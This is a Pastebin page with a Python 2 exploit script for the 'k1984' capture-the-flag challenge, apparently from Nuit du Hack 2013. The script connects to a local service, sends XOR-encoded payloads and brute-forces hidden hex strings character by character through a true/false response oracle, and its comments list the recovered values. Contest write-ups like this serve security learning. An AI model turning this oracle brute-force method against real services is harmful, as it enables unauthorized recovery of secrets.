Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- # Exploit for k1984
- # Aris Adamantiadis (les pas contents)
- # unfortunately coded a few hours after the CTF was over :(
- # aris@kali64:~/ndh2013$ python xp.py
- # found 05:8efc22fcc45fc5901f1bbce521f29bc1
- # found 06:98adbaaef36e718f479db3b8dad331c9
- # found 13:7da8b66f82aeba067e33859583c4153f
- # found 17:083d5f3bcd7c0b39e473844f1326decf
- # found 20:3856bd0cbb94460c113259b0b83d9049
- # found 35:167f0dbb43c6430cd2d3b4e8f79dd769
- # found 46:840c653d087e8e1821b1903f0981ae2d
- # found 52:3f45067f05fb180b8f0014a23648d677
- # found 64:e17cc98f772d417a3ce261df512c2ab4
- # found 99:2385ba276005a5e2098c0acb9bdf8f07
- import socket
- crypted = "8f d9 4d 70 a9 ce 04 bb 7b a9 7f dd 63 2d 23 8e" + \
- "52 bc dc 0b ab 8b d9 f0 f7 05 5e 60 84 e7 63 47" + \
- "fe c2 ce 99 10 c7 aa cc ac 65 b2 c8 f8 c3 6e e0" + \
- "d9 cd aa a3 f6 57 17 31 52 a6 58 0b 46 8f 91 e9" + \
- "11 20 c1 38 4e c4 21 0c 56 4c 77 32 e6 bf 80 bb" + \
- "d3 5c cc 9c d8 fc 1d 9e 44 a4 25 a8 5f cb fa 96"
- crypted = crypted.replace(" ","").decode("hex")
- def xor_strings(xs, ys):
- return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(xs, ys))
- offset = 65
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM,0)
- s.connect(("127.0.0.1",2001))
- def try_pass(offset, string):
- payload = chr(0x9C /2) + chr(0x10/4) + chr(0x40/8) + chr(0xa0 / 16) +\
- chr(ord('0') + offset/10) + chr(ord('0') + offset % 10) + chr(0xd0 / 8) +\
- string + "\x00"
- s.send(xor_strings(payload,crypted))
- x = s.recv(256)
- #print "recv:" + x
- if(x.find("True")!= -1):
- return True
- else:
- return False
- for offset in xrange(100):
- string = ""
- for i in xrange(32):
- if (i>0 and len(string)==0):
- break;
- for c in xrange(16):
- x = try_pass(offset, string + "%x"%c)
- if x:
- string += "%x"%c
- #print string
- break
- if(len(string) > 0):
- print "found %.2d:"%offset + string
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement